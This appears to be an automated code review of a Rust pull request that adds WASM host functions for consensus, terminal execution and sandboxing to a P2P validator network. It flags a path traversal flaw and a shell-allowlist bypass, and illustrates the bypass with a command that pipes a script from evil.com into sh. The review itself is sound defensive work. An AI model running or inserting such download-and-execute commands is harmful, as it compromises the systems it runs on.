(ConsensusHostStatus::Disabled) as success and truncate the buffer; update each
function to treat status == 1 as an error (i.e., return Err(status)) rather than
truncating/returning data — only treat genuinely successful status values as
success (e.g., status > 1 for payload-returning calls), and keep the existing
negative-error check; change the conditional around the unsafe consensus_* call
in host_consensus_get_validators, host_consensus_get_votes and
host_consensus_get_state_hash to explicitly return Err(status) when status == 1
(or otherwise not in the valid-success range) so disabled responses are not
misinterpreted as data.
| #[derive(Debug, Clone, Copy, PartialEq, Eq)] | ||
| #[repr(i32)] | ||
| pub enum ConsensusHostStatus { | ||
| Success = 0, | ||
| Disabled = 1, | ||
| BufferTooSmall = -1, | ||
| ProposalLimitExceeded = -2, | ||
| InvalidArgument = -3, | ||
| InternalError = -100, | ||
| } |
There was a problem hiding this comment.
Disabled = 1 (positive) is the root cause of the SDK-side data corruption bug.
ConsensusHostStatus::Disabled = 1 is the only non-success status with a positive value. This breaks the convention used by SDK wrappers (status < 0 → error). Functions returning buffer sizes (like handle_get_validators) will cause the SDK to misinterpret 1 as "1 byte written."
Consider making all non-success statuses negative, or at minimum, making Disabled negative.
🐛 Proposed fix
pub enum ConsensusHostStatus {
Success = 0,
- Disabled = 1,
+ Disabled = -10,
BufferTooSmall = -1,
ProposalLimitExceeded = -2,
InvalidArgument = -3,
InternalError = -100,
}Update from_i32 accordingly:
pub fn from_i32(code: i32) -> Self {
match code {
0 => Self::Success,
- 1 => Self::Disabled,
+ -10 => Self::Disabled,
-1 => Self::BufferTooSmall,
-2 => Self::ProposalLimitExceeded,
-3 => Self::InvalidArgument,
_ => Self::InternalError,
}
}🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.
In `@crates/wasm-runtime-interface/src/consensus.rs` around lines 30 - 39, The
enum ConsensusHostStatus has a positive value for Disabled which breaks the SDK
convention that non-success statuses are negative; change
ConsensusHostStatus::Disabled to a negative value (e.g., -1 or another unused
negative code) and update any conversion/mapper (e.g., from_i32 or match arms
that map i32→ConsensusHostStatus) to reflect the new negative value so SDK
wrappers that treat status<0 as error work correctly; ensure no other variant
collisions occur when renumbering.
| let mut child = cmd | ||
| .spawn() | ||
| .map_err(|e| SandboxExecError::ExecutionFailed(e.to_string()))?; | ||
|
|
||
| if has_stdin { | ||
| if let Some(ref stdin_data) = request.stdin { | ||
| if let Some(ref mut stdin) = child.stdin { | ||
| use std::io::Write; | ||
| let _ = stdin.write_all(stdin_data); | ||
| } | ||
| } | ||
| child.stdin.take(); | ||
| } | ||
|
|
||
| let output = loop { | ||
| if start.elapsed() > timeout { | ||
| let _ = child.kill(); | ||
| return Err(SandboxExecError::ExecutionTimeout(timeout.as_secs())); | ||
| } | ||
| match child.try_wait() { | ||
| Ok(Some(_)) => { | ||
| break child | ||
| .wait_with_output() | ||
| .map_err(|e| SandboxExecError::ExecutionFailed(e.to_string()))? | ||
| } | ||
| Ok(None) => std::thread::sleep(Duration::from_millis(10)), | ||
| Err(e) => return Err(SandboxExecError::ExecutionFailed(e.to_string())), | ||
| } | ||
| }; |
There was a problem hiding this comment.
Potential deadlock when writing stdin to a child process with piped stdout/stderr.
If the child process produces enough output to fill the OS pipe buffer for stdout/stderr before consuming all its stdin, write_all on line 436 will block waiting for the child to read, while the child is blocked waiting for us to read its stdout. This is a classic deadlock scenario with synchronous piped I/O (the Rust std::process docs warn about this). The timeout loop on lines 442–456 would never be reached.
Consider writing stdin in a separate thread, or using wait_with_output() (which handles the I/O concurrently) after spawning the child with stdin pre-written via a separate thread.
Sketch of a safer approach
- let mut child = cmd
- .spawn()
- .map_err(|e| SandboxExecError::ExecutionFailed(e.to_string()))?;
-
- if has_stdin {
- if let Some(ref stdin_data) = request.stdin {
- if let Some(ref mut stdin) = child.stdin {
- use std::io::Write;
- let _ = stdin.write_all(stdin_data);
- }
- }
- child.stdin.take();
- }
-
- let output = loop {
- if start.elapsed() > timeout {
- let _ = child.kill();
- return Err(SandboxExecError::ExecutionTimeout(timeout.as_secs()));
- }
- match child.try_wait() {
- Ok(Some(_)) => {
- break child
- .wait_with_output()
- .map_err(|e| SandboxExecError::ExecutionFailed(e.to_string()))?
- }
- Ok(None) => std::thread::sleep(Duration::from_millis(10)),
- Err(e) => return Err(SandboxExecError::ExecutionFailed(e.to_string())),
- }
- };
+ let mut child = cmd
+ .spawn()
+ .map_err(|e| SandboxExecError::ExecutionFailed(e.to_string()))?;
+
+ // Write stdin on a separate thread to avoid deadlock with piped stdout/stderr
+ if has_stdin {
+ let stdin_data = request.stdin.clone().unwrap_or_default();
+ let mut child_stdin = child.stdin.take().unwrap();
+ std::thread::spawn(move || {
+ use std::io::Write;
+ let _ = child_stdin.write_all(&stdin_data);
+ // child_stdin is dropped here, closing the pipe
+ });
+ }
+
+ let output = loop {
+ if start.elapsed() > timeout {
+ let _ = child.kill();
+ return Err(SandboxExecError::ExecutionTimeout(timeout.as_secs()));
+ }
+ match child.try_wait() {
+ Ok(Some(_)) => {
+ break child
+ .wait_with_output()
+ .map_err(|e| SandboxExecError::ExecutionFailed(e.to_string()))?
+ }
+ Ok(None) => std::thread::sleep(Duration::from_millis(10)),
+ Err(e) => return Err(SandboxExecError::ExecutionFailed(e.to_string())),
+ }
+ };📝 Committable suggestion
‼️ IMPORTANT
Carefully review the code before committing. Ensure that it accurately replaces the highlighted code, contains no missing lines, and has no issues with indentation. Thoroughly test & benchmark the code to ensure it meets the requirements.
| let mut child = cmd | |
| .spawn() | |
| .map_err(|e| SandboxExecError::ExecutionFailed(e.to_string()))?; | |
| if has_stdin { | |
| if let Some(ref stdin_data) = request.stdin { | |
| if let Some(ref mut stdin) = child.stdin { | |
| use std::io::Write; | |
| let _ = stdin.write_all(stdin_data); | |
| } | |
| } | |
| child.stdin.take(); | |
| } | |
| let output = loop { | |
| if start.elapsed() > timeout { | |
| let _ = child.kill(); | |
| return Err(SandboxExecError::ExecutionTimeout(timeout.as_secs())); | |
| } | |
| match child.try_wait() { | |
| Ok(Some(_)) => { | |
| break child | |
| .wait_with_output() | |
| .map_err(|e| SandboxExecError::ExecutionFailed(e.to_string()))? | |
| } | |
| Ok(None) => std::thread::sleep(Duration::from_millis(10)), | |
| Err(e) => return Err(SandboxExecError::ExecutionFailed(e.to_string())), | |
| } | |
| }; | |
| let mut child = cmd | |
| .spawn() | |
| .map_err(|e| SandboxExecError::ExecutionFailed(e.to_string()))?; | |
| if has_stdin { | |
| if let Some(ref stdin_data) = request.stdin { | |
| if let Some(stdin) = child.stdin.take() { | |
| let stdin_data = stdin_data.clone(); | |
| std::thread::spawn(move || { | |
| use std::io::Write; | |
| let mut stdin = stdin; | |
| let _ = stdin.write_all(&stdin_data); | |
| }); | |
| } | |
| } else { | |
| child.stdin.take(); | |
| } | |
| } | |
| let output = loop { | |
| if start.elapsed() > timeout { | |
| let _ = child.kill(); | |
| return Err(SandboxExecError::ExecutionTimeout(timeout.as_secs())); | |
| } | |
| match child.try_wait() { | |
| Ok(Some(_)) => { | |
| break child | |
| .wait_with_output() | |
| .map_err(|e| SandboxExecError::ExecutionFailed(e.to_string()))? | |
| } | |
| Ok(None) => std::thread::sleep(Duration::from_millis(10)), | |
| Err(e) => return Err(SandboxExecError::ExecutionFailed(e.to_string())), | |
| } | |
| }; |
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.
In `@crates/wasm-runtime-interface/src/sandbox.rs` around lines 428 - 456, The
current synchronous write_all to child.stdin after spawning (in the block
referencing cmd.spawn(), has_stdin, request.stdin, write_all and child.stdin)
can deadlock if the child fills stdout/stderr buffers before reading stdin; move
stdin writing off the main thread by spawning a dedicated thread to take
child.stdin, write_all the bytes, and then drop/close it (or use
wait_with_output which concurrently handles stdio) before entering the existing
timeout loop that polls child.try_wait() and uses wait_with_output; ensure the
writer thread is detached or joined appropriately and that errors from the write
are converted to SandboxExecError::ExecutionFailed so the timeout/kill logic
(start, timeout, child.kill, SandboxExecError::ExecutionTimeout) still functions
correctly.
| #[derive(Debug, Clone, Copy, PartialEq, Eq)] | ||
| #[repr(i32)] | ||
| pub enum TerminalHostStatus { | ||
| Success = 0, | ||
| Disabled = 1, | ||
| CommandNotAllowed = -1, | ||
| PathNotAllowed = -2, | ||
| FileTooLarge = -3, | ||
| BufferTooSmall = -4, | ||
| IoError = -5, | ||
| LimitExceeded = -6, | ||
| Timeout = -7, | ||
| InternalError = -100, | ||
| } |
There was a problem hiding this comment.
Disabled = 1 (positive) breaks the SDK's status < 0 error-detection pattern.
TerminalHostStatus::Disabled is set to 1, but SDK-side wrappers (e.g., host_terminal_exec) use status < 0 to detect errors. When terminal is disabled, the host returns 1, which the SDK interprets as "1 byte of data written successfully." Consider changing Disabled to a negative value to align with the error-detection convention.
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.
In `@crates/wasm-runtime-interface/src/terminal.rs` around lines 30 - 43,
TerminalHostStatus::Disabled is currently set to a positive value (1) which
breaks the SDK's error-detection pattern (status < 0); change the Disabled
variant in the TerminalHostStatus enum to a negative error code (e.g., -8 or
another unused negative value) so it is treated as an error by SDK wrappers like
host_terminal_exec, and update any related docs/tests/constants that assume the
old value.
| pub fn is_path_allowed(&self, path: &str) -> bool { | ||
| if !self.enabled { | ||
| return false; | ||
| } | ||
| if self.allowed_paths.is_empty() { | ||
| return true; | ||
| } | ||
| self.allowed_paths.iter().any(|p| path.starts_with(p)) | ||
| } |
There was a problem hiding this comment.
Critical: Path traversal via .. components bypasses is_path_allowed.
is_path_allowed uses a simple path.starts_with(p) check without canonicalizing the path. A WASM module can pass "/tmp/../etc/passwd" which passes the /tmp prefix check but resolves to /etc/passwd when std::fs::read is called.
Proposed fix: canonicalize before checking
pub fn is_path_allowed(&self, path: &str) -> bool {
if !self.enabled {
return false;
}
if self.allowed_paths.is_empty() {
return true;
}
- self.allowed_paths.iter().any(|p| path.starts_with(p))
+ // Canonicalize to resolve ".." and symlinks before checking the prefix
+ let canonical = match std::fs::canonicalize(path) {
+ Ok(p) => p,
+ // For write operations the file may not exist yet; resolve the parent
+ Err(_) => {
+ let parent = std::path::Path::new(path).parent();
+ match parent.and_then(|p| std::fs::canonicalize(p).ok()) {
+ Some(p) => p,
+ None => return false,
+ }
+ }
+ };
+ let canonical_str = canonical.to_string_lossy();
+ self.allowed_paths.iter().any(|p| canonical_str.starts_with(p))
}Also applies to: 397-409
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.
In `@crates/wasm-runtime-interface/src/terminal.rs` around lines 139 - 147, The
is_path_allowed function currently checks prefixes with path.starts_with(p)
which allows path traversal like "/tmp/../etc/passwd"; change the check to
compare normalized/canonicalized paths: normalize the incoming path (resolve
"."/".." components and make it absolute) and normalize the stored allowed_paths
before comparison (or canonicalize both using std::fs::canonicalize where
possible), and on any canonicalization/error return false; update the same
prefix-check logic in the other occurrence of this permission check so
comparisons use normalized absolute paths rather than raw starts_with.
| fn handle_terminal_exec( | ||
| caller: &mut Caller<RuntimeState>, | ||
| cmd_ptr: i32, | ||
| cmd_len: i32, | ||
| result_ptr: i32, | ||
| result_len: i32, | ||
| ) -> i32 { | ||
| let enabled = caller.data().terminal_state.policy.enabled; | ||
| if !enabled { | ||
| return TerminalHostStatus::Disabled.to_i32(); | ||
| } | ||
|
|
||
| let cmd_bytes = match read_wasm_memory(caller, cmd_ptr, cmd_len) { | ||
| Ok(bytes) => bytes, | ||
| Err(err) => { | ||
| warn!(error = %err, "terminal_exec: failed to read command from wasm memory"); | ||
| return TerminalHostStatus::InternalError.to_i32(); | ||
| } | ||
| }; | ||
|
|
||
| let cmd_str = match std::str::from_utf8(&cmd_bytes) { | ||
| Ok(s) => s.to_string(), | ||
| Err(_) => return TerminalHostStatus::InternalError.to_i32(), | ||
| }; | ||
|
|
||
| let command_name = cmd_str.split_whitespace().next().unwrap_or("").to_string(); | ||
|
|
||
| { | ||
| let state = &caller.data().terminal_state; | ||
| if !state.policy.is_command_allowed(&command_name) { | ||
| warn!( | ||
| challenge_id = %state.challenge_id, | ||
| command = %command_name, | ||
| "terminal_exec: command not allowed" | ||
| ); | ||
| return TerminalHostStatus::CommandNotAllowed.to_i32(); | ||
| } | ||
| if state.executions >= state.policy.max_executions { | ||
| return TerminalHostStatus::LimitExceeded.to_i32(); | ||
| } | ||
| } | ||
|
|
||
| let timeout_ms = caller.data().terminal_state.policy.timeout_ms; | ||
| let max_output = caller.data().terminal_state.policy.max_output_bytes; | ||
|
|
||
| let output = match Command::new("sh") | ||
| .arg("-c") | ||
| .arg(&cmd_str) | ||
| .stdin(std::process::Stdio::null()) | ||
| .stdout(std::process::Stdio::piped()) | ||
| .stderr(std::process::Stdio::piped()) | ||
| .spawn() | ||
| { | ||
| Ok(child) => { | ||
| let start = std::time::Instant::now(); | ||
| let timeout = Duration::from_millis(timeout_ms); | ||
| match child.wait_with_output() { | ||
| Ok(out) => { | ||
| if start.elapsed() > timeout { | ||
| return TerminalHostStatus::Timeout.to_i32(); | ||
| } | ||
| out | ||
| } | ||
| Err(err) => { | ||
| warn!(error = %err, "terminal_exec: command wait failed"); | ||
| return TerminalHostStatus::IoError.to_i32(); | ||
| } | ||
| } | ||
| } | ||
| Err(err) => { | ||
| warn!(error = %err, "terminal_exec: command spawn failed"); | ||
| return TerminalHostStatus::IoError.to_i32(); | ||
| } | ||
| }; | ||
|
|
||
| caller.data_mut().terminal_state.executions += 1; | ||
|
|
||
| let mut result_data = output.stdout; | ||
| if result_data.len() > max_output { | ||
| result_data.truncate(max_output); | ||
| } | ||
|
|
||
| if result_len < 0 || result_data.len() > result_len as usize { | ||
| return TerminalHostStatus::BufferTooSmall.to_i32(); | ||
| } | ||
|
|
||
| if let Err(err) = write_wasm_memory(caller, result_ptr, &result_data) { | ||
| warn!(error = %err, "terminal_exec: failed to write result to wasm memory"); | ||
| return TerminalHostStatus::InternalError.to_i32(); | ||
| } | ||
|
|
||
| result_data.len() as i32 | ||
| } |
There was a problem hiding this comment.
Critical: Command allowlist is trivially bypassed and timeout is ineffective.
Two serious security issues in handle_terminal_exec:
-
Allowlist bypass: Line 308 extracts only the first word as
command_name, but lines 328-330 always execute viash -c <entire_cmd_str>. A WASM module sending"echo; curl http://evil.com | sh"passes the check (since"echo"is allowed) but executes arbitrary shell commands. The allowlist provides no real protection. -
Blocking + ineffective timeout:
child.wait_with_output()(line 339) blocks until the process exits. The timeout check at line 341 only runs after the process has already completed, sosleep 99999will block the WASM host thread indefinitely. You need to use atokio::process::Commandwith timeout, or poll the child in a loop with a deadline, or usechild.try_wait()in a spin loop.
Sketch for a safer exec approach
- let command_name = cmd_str.split_whitespace().next().unwrap_or("").to_string();
+ // Parse the command properly: only allow direct execution of the binary,
+ // not shell interpretation. Reject commands containing shell metacharacters.
+ let parts: Vec<&str> = cmd_str.split_whitespace().collect();
+ let command_name = parts.first().copied().unwrap_or("");
{
let state = &caller.data().terminal_state;
if !state.policy.is_command_allowed(&command_name) {
// ...
}
}
- let output = match Command::new("sh")
- .arg("-c")
- .arg(&cmd_str)
+ let output = match Command::new(command_name)
+ .args(&parts[1..])
.stdin(std::process::Stdio::null())
.stdout(std::process::Stdio::piped())
.stderr(std::process::Stdio::piped())
.spawn()For timeout enforcement, use a polling loop with child.try_wait() or spawn the process on a background thread with a kill deadline.
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.
In `@crates/wasm-runtime-interface/src/terminal.rs` around lines 283 - 375,
handle_terminal_exec currently validates only the first token (command_name) but
then runs the entire cmd_str via "sh -c", and it blocks on
child.wait_with_output(), allowing allowlist bypass and hanging; fix by (1)
rejecting or sanitizing any shell metacharacters in cmd_str or, better, parse
cmd_str into an argv vector and execute the binary directly
(Command::new(&argv[0]).args(&argv[1..])) so no shell interpretation occurs —
update the use of command_name/cmd_str parsing and the spawn call accordingly —
and (2) replace the blocking child.wait_with_output() with a nonblocking timeout
implementation (use child.try_wait() in a loop with
Instant::now()+Duration::from_millis(timeout_ms) and sleep small intervals,
killing the child via child.kill() if deadline exceeded, or run the child on a
background thread and join with a timeout) so timeout_ms is enforced; adjust
error returns/logs in handle_terminal_exec to reflect killed/timeouts.
| fn handle_terminal_random_seed( | ||
| caller: &mut Caller<RuntimeState>, | ||
| buf_ptr: i32, | ||
| buf_len: i32, | ||
| ) -> i32 { | ||
| if buf_len <= 0 { | ||
| return TerminalHostStatus::InternalError.to_i32(); | ||
| } | ||
|
|
||
| let len = buf_len as usize; | ||
| let mut seed = vec![0u8; len]; | ||
|
|
||
| // Use a deterministic seed based on challenge_id and timestamp for reproducibility | ||
| let challenge_id = caller.data().challenge_id.clone(); | ||
| let ts = caller | ||
| .data() | ||
| .fixed_timestamp_ms | ||
| .unwrap_or_else(|| chrono::Utc::now().timestamp_millis()); | ||
|
|
||
| use sha2::{Digest, Sha256}; | ||
| let mut hasher = Sha256::new(); | ||
| hasher.update(challenge_id.as_bytes()); | ||
| hasher.update(ts.to_le_bytes()); | ||
| let hash = hasher.finalize(); | ||
|
|
||
| for (i, byte) in seed.iter_mut().enumerate() { | ||
| *byte = hash[i % 32]; | ||
| } | ||
|
|
||
| if let Err(err) = write_wasm_memory(caller, buf_ptr, &seed) { | ||
| warn!(error = %err, "terminal_random_seed: failed to write to wasm memory"); | ||
| return TerminalHostStatus::InternalError.to_i32(); | ||
| } | ||
|
|
||
| TerminalHostStatus::Success.to_i32() | ||
| } |
There was a problem hiding this comment.
Random seed is not truly deterministic across validators for the same challenge.
handle_terminal_random_seed uses challenge_id + timestamp to derive a seed. When fixed_timestamp_ms is None, it falls back to chrono::Utc::now() (line 582), which will differ across validators and produce different seeds for the same challenge. This breaks the deterministic execution guarantee for challenges unless fixed_timestamp_ms is always set.
Additionally, the seed only varies by challenge_id and timestamp — calling it multiple times within the same millisecond returns the same bytes. Consider incorporating a call counter.
Based on learnings: "Challenge evaluation must execute deterministically within the WASM runtime sandbox."
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.
In `@crates/wasm-runtime-interface/src/terminal.rs` around lines 565 - 600,
handle_terminal_random_seed currently uses chrono::Utc::now() when
fixed_timestamp_ms is None which yields non-deterministic seeds across
validators; change to only use deterministic inputs (challenge_id and a
deterministic per-call counter stored on RuntimeState) and fail if
fixed_timestamp_ms is not set or omit timestamp entirely. Specifically: in
handle_terminal_random_seed, remove the chrono::Utc fallback and instead read a
call counter field on RuntimeState (e.g., add or use
runtime_state.terminal_seed_counter), include that counter and challenge_id in
the Sha256 input (hasher.update(counter.to_le_bytes())), then increment and
persist the counter back to caller.data() before returning; if you must use a
timestamp require fixed_timestamp_ms to be Some and return
TerminalHostStatus::InternalError when it is None so seeds remain deterministic
across validators. Ensure the unique symbols mentioned
(handle_terminal_random_seed, fixed_timestamp_ms, RuntimeState,
terminal_seed_counter, write_wasm_memory) are updated accordingly.
Summary
Implement comprehensive P2P infrastructure and WASM host function support so that future WASM challenges can operate end-to-end on the decentralized network without any centralized server. This adds new host function namespaces, extends the P2P message protocol, and enriches consensus state for full challenge lifecycle management.
Changes
WASM Runtime (
crates/wasm-runtime-interface/)consensus.rs:platform_consensushost function namespace withConsensusPolicy,ConsensusState, andConsensusHostFunctions— exposesconsensus_get_epoch,consensus_get_validators,consensus_propose_weight,consensus_get_votes,consensus_get_state_hash,consensus_get_submission_count,consensus_get_block_heightterminal.rs:platform_terminalhost function namespace withTerminalPolicy,TerminalState, andTerminalHostFunctions— implementsterminal_exec,terminal_read_file,terminal_write_file,terminal_list_dir,terminal_get_time,terminal_random_seedwith path/command allow-listingsandbox.rs: ImplementHostFunctionRegistrarforSandboxHostFunctionswith real Wasmtime linker registration forsandbox_exec,get_timestamp,log_messageruntime.rs: Register all new host function namespaces (consensus, terminal, sandbox, exec, time) inWasmRuntime::instantiate(); addConsensusStateandTerminalStatetoRuntimeState; addConsensusPolicyandTerminalPolicytoInstanceConfigP2P Consensus (
crates/p2p-consensus/)P2PMessageenum (appended at end for bincode backward compatibility):JobClaim,JobAssignment,DataRequest,DataResponse,TaskProgress,TaskResult,LeaderboardRequest,LeaderboardResponse,ChallengeUpdate,StorageProposal,StorageVote— with full message structsChainState: Addedleaderboard,active_jobs,task_progress,challenge_storage_rootsfields with methodsassign_job(),complete_job(),update_leaderboard(),get_leaderboard(),update_task_progress(),update_challenge_storage_root(),cleanup_stale_jobs()— all with proper sequence increment and hash updateValidator Node (
bins/validator-node/)challenge_storage.rs:ChallengeStorageBackendimplementingStorageBackendtrait backed by realLocalStoragefromdistributed-storage— replacesNoopStorageBackendfor production usemain.rs: Handle all new P2P message types inhandle_network_event()with proper logging and state updates; add stale job cleanup periodic task (120s interval); handle previously unmatched messages (StateRequest,StateResponse,WeightVote,PeerAnnounce)wasm_executor.rs: WireConsensusPolicyandTerminalPolicyintoInstanceConfig; upgrade storage backend fromNoopStorageBackendtoInMemoryStorageBackendChallenge SDK WASM (
crates/challenge-sdk-wasm/)host_functions.rs: Addplatform_consensusextern block with all consensus host function imports and safe Rust wrappers (host_consensus_get_epoch,host_consensus_get_validators,host_consensus_propose_weight, etc.)Notes
P2PMessagevariants are added at the end of the enum to maintain bincode serialization backward compatibilityEvaluationInput/EvaluationOutputserialization formatChallengeStorageBackendis placed invalidator-node(notwasm-runtime-interface) to avoid a cyclic dependency throughdistributed-storage→platform-core→wasm-runtime-interfaceSummary by CodeRabbit
Release Notes
New Features
Chores